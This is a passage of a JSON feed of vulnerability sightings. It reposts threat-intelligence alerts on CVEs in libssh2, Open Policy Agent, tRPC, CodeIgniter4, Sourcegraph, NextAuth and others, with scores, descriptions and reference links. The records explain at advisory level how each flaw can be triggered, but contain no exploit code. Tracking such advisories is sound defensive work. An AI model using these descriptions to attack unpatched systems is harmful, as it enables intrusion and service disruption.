2019-03-25T17:52:10.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:19.703Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3863\n2. https://www.libssh2.org/CVE-2019-3863.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:44.000000Z"}, {"uuid": "10c8406c-10e0-4c2c-b80b-4c3fb740d984", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XW3-V6C2-J84J", "type": "published-proof-of-concept", "source": "Telegram/hcDjc3NhGUoeZSSWMq1-Ad9hJdURxw9h6RqjETU5SUNNrCg", "content": "", "creation_timestamp": "2026-01-02T21:53:57.000000Z"}, {"uuid": "6642361f-b1c3-48a5-a05a-ac1aff2dd2a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1791", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3863\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in libssh2 before 1.8.1. A server could send a multiple keyboard interactive response messages whose total length are greater than unsigned char max characters. This value is used as an index to copy memory causing in an out of bounds memory write error.\n\ud83d\udccf Published: 2019-03-25T17:52:10.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:19.703Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3863\n2. https://www.libssh2.org/CVE-2019-3863.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:44.000000Z"}, {"uuid": "33105e34-fe2b-4dab-aed3-8c3ea9b25bfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1175", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3857\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 before 1.8.1 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:30:56.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:11.114Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3857\n2. https://www.libssh2.org/CVE-2019-3857.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:48.000000Z"}, {"uuid": "83a3ed00-e744-449f-b165-4ef716bf3ca8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1943", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3857\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 before 1.8.1 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:30:56.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:11.114Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3857\n2. https://www.libssh2.org/CVE-2019-3857.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:48.000000Z"}, {"uuid": "136e6194-6a79-452c-9b50-121c692b1b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1791", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3857\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 before 1.8.1 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:30:56.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:11.114Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3857\n2. https://www.libssh2.org/CVE-2019-3857.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:48.000000Z"}, {"uuid": "e2e4dcf3-8efb-44a5-81a2-cd880e5382c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9J5G-G4XM-57W7", "type": "published-proof-of-concept", "source": "Telegram/hcDjc3NhGUoeZSSWMq1-Ad9hJdURxw9h6RqjETU5SUNNrCg", "content": "", "creation_timestamp": "2026-01-02T21:53:57.000000Z"}, {"uuid": "f8698219-b809-4867-b5e7-30bdf3306fe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:0679", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3857\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 before 1.8.1 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:30:56.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:11.114Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3857\n2. https://www.libssh2.org/CVE-2019-3857.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:48.000000Z"}, {"uuid": "d11f4f75-f300-4959-bb9e-d8022cfdc394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:2399", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3857\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 before 1.8.1 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:30:56.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:11.114Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3857\n2. https://www.libssh2.org/CVE-2019-3857.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:48.000000Z"}, {"uuid": "7c725d5b-2f18-4128-9a69-848750cf98a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1652", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3857\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw which could lead to an out of bounds write was discovered in libssh2 before 1.8.1 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:30:56.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:11.114Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3857\n2. https://www.libssh2.org/CVE-2019-3857.html\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:48.000000Z"}, {"uuid": "25d1d1f3-189a-4f6e-948e-e8f6f42bfed2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6M8W-JC87-6CR7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14399", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46569\n\ud83d\udd25 CVSS Score: 7.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Open Policy Agent (OPA) is an open source, general-purpose policy engine. Prior to version 1.4.0, when run as a server, OPA exposes an HTTP Data API for reading and writing documents. Requesting a virtual document through the Data API entails policy evaluation, where a Rego query containing a single data document reference is constructed from the requested path. This query is then used for policy evaluation. A HTTP request path can be crafted in a way that injects Rego code into the constructed query. The evaluation result cannot be made to return any other data than what is generated by the requested path, but this path can be misdirected, and the injected Rego code can be crafted to make the query succeed or fail; opening up for oracle attacks or, given the right circumstances, erroneous policy decision results. Furthermore, the injected code can be crafted to be computationally expensive, resulting in a Denial Of Service (DoS) attack. This issue has been patched in version 1.4.0. A workaround involves having network access to OPA\u2019s RESTful APIs being limited to `localhost` and/or trusted networks, unless necessary for production reasons.\n\ud83d\udccf Published: 2025-05-01T19:32:47.988Z\n\ud83d\udccf Modified: 2025-05-01T19:32:47.988Z\n\ud83d\udd17 References:\n1. https://github.com/open-policy-agent/opa/security/advisories/GHSA-6m8w-jc87-6cr7\n2. https://github.com/open-policy-agent/opa/commit/ad2063247a14711882f18c387a511fc8094aa79c", "creation_timestamp": "2025-05-01T20:16:05.000000Z"}, {"uuid": "9a3aed95-6791-4a88-a196-3b92695e5ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:0679", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3856\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 before 1.8.1 in the way keyboard prompt requests are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:31:03.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:00.365Z\n\ud83d\udd17 References:\n1. https://www.libssh2.org/CVE-2019-3856.html\n2. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3856\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:49.000000Z"}, {"uuid": "6edc5573-90fa-464d-80c5-60ab6bf1a954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37QP-9JQ6-F6MX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13106", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31155\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Sourcegraph is an opensource code search and navigation engine. In Sourcegraph versions before 3.41.0, it is possible for an attacker to delete other users\u2019 saved searches due to a bug in the authorization check. The vulnerability does not allow the reading of other users\u2019 saved searches, only overwriting them with attacker-controlled searches. The issue is patched in Sourcegraph version 3.41.0. There is no workaround for this issue and updating to a secure version is highly recommended.\n\ud83d\udccf Published: 2022-08-01T18:40:28.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:41.203Z\n\ud83d\udd17 References:\n1. https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-37qp-9jq6-f6mx\n2. https://github.com/sourcegraph/sourcegraph/commit/2832d7882396a6295ba5803b5ef48dc7d5a24c59", "creation_timestamp": "2025-04-23T18:05:48.000000Z"}, {"uuid": "c59c6c28-972c-4245-963f-f390996f635a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJ3V-9CM8-GVJ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13224", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43855\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: tRPC allows users to build &amp; consume fully typesafe APIs without schemas or code generation. In versions starting from 11.0.0 to before 11.1.1, an unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server. Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. This issue has been patched in version 11.1.1.\n\ud83d\udccf Published: 2025-04-24T13:58:30.536Z\n\ud83d\udccf Modified: 2025-04-24T13:58:30.536Z\n\ud83d\udd17 References:\n1. https://github.com/trpc/trpc/security/advisories/GHSA-pj3v-9cm8-gvj8\n2. https://github.com/trpc/trpc/commit/9beb26c636d44852e0f407f3d7a82ad54df65b4d", "creation_timestamp": "2025-04-24T14:05:40.000000Z"}, {"uuid": "919b2663-8eae-44a9-bae8-bbaf20708cee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P6MM-27GQ-9V3P", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31186\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: NextAuth.js is a complete open source authentication solution for Next.js applications. An information disclosure vulnerability in `next-auth` before `v4.10.2` and `v3.29.9` allows an attacker with log access privilege to obtain excessive information such as an identity provider's secret in the log (which is thrown during OAuth error handling) and use it to leverage further attacks on the system, like impersonating the client to ask for extensive permissions. This issue has been patched in `v4.10.2` and `v3.29.9` by moving the log for `provider` information to the debug level. In addition, we added a warning for having the `debug: true` option turned on in production. If for some reason you cannot upgrade, you can user the `logger` configuration option by sanitizing the logs.\n\ud83d\udccf Published: 2022-08-01T19:25:24.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:16.785Z\n\ud83d\udd17 References:\n1. https://next-auth.js.org/getting-started/upgrade-v4\n2. https://github.com/nextauthjs/next-auth/security/advisories/GHSA-p6mm-27gq-9v3p\n3. https://next-auth.js.org/configuration/options#logger\n4. https://next-auth.js.org/warnings#debug_enabled", "creation_timestamp": "2025-04-23T18:05:54.000000Z"}, {"uuid": "74ddf00a-f3dc-4462-b83e-c5cc21d97ad3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JM39-H693-678G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13109", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31185\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: mprweb is a hosting platform for the makedeb Package Repository. Email addresses were found to not have been hidden, even if a user had clicked the `Hide Email Address` checkbox on their account page, or during signup. This could lead to an account's email being leaked, which may be problematic if your email needs to remain private for any reason. Users hosting their own mprweb instance will need to upgrade to the latest commit to get this fixed. Users on the official instance will already have this issue fixed.\n\ud83d\udccf Published: 2022-08-01T19:25:11.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:22.307Z\n\ud83d\udd17 References:\n1. https://github.com/makedeb/mprweb/security/advisories/GHSA-jm39-h693-678g\n2. https://github.com/makedeb/mprweb/commit/d13e3f2f5a9c0b0f6782f35d837090732026ad77", "creation_timestamp": "2025-04-23T18:05:50.000000Z"}, {"uuid": "061a220a-c583-4620-9dc2-1b6d2b949e84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F68P-C9WH-J2Q8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13113", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-41112\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)\n\ud83d\udd39 Description: Rundeck is an open source automation service with a web console, command line tools and a WebAPI. In versions prior to 3.4.5, authenticated users could craft a request to modify or delete System or Project level Calendars, without appropriate authorization. Modifying or removing calendars could cause Scheduled Jobs to execute, or not execute on desired calendar days. Severity depends on trust level of authenticated users and impact of running or not running scheduled jobs on days governed by calendar definitions. Version 3.4.5 contains a patch for this issue. There are currently no known workarounds.\n\ud83d\udccf Published: 2022-02-28T19:15:17.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:54.497Z\n\ud83d\udd17 References:\n1. https://github.com/rundeck/rundeck/security/advisories/GHSA-f68p-c9wh-j2q8", "creation_timestamp": "2025-04-23T19:05:06.000000Z"}, {"uuid": "ba587d63-1ef9-4424-be6f-8dce56fe3b1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4V37-24GM-H554", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13111", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24712\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L)\n\ud83d\udd39 Description: CodeIgniter4 is the 4.x branch of CodeIgniter, a PHP full-stack web framework. A vulnerability in versions prior to 4.1.9 might allow remote attackers to bypass the CodeIgniter4 Cross-Site Request Forgery (CSRF) protection mechanism. Users should upgrade to version 4.1.9. There are workarounds for this vulnerability, but users will still need to code as these after upgrading to v4.1.9. Otherwise, the CSRF protection may be bypassed. If auto-routing is enabled, check the request method in the controller method before processing. If auto-routing is disabled, either avoid using `$routes-&gt;add()` and instead use HTTP verbs in routes; or check the request method in the controller method before processing.\n\ud83d\udccf Published: 2022-02-28T16:00:12.000Z\n\ud83d\udccf Modified: 2025-04-23T19:00:10.052Z\n\ud83d\udd17 References:\n1. https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-4v37-24gm-h554\n2. https://github.com/codeigniter4/CodeIgniter4/blob/7dc2ece32401ebde67122f7d2460efcaee7c352e/user_guide_src/source/changelogs/v4.1.9.rst", "creation_timestamp": "2025-04-23T19:05:04.000000Z"}, {"uuid": "d17d3edc-21b1-4c25-9e25-3f370141d51a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 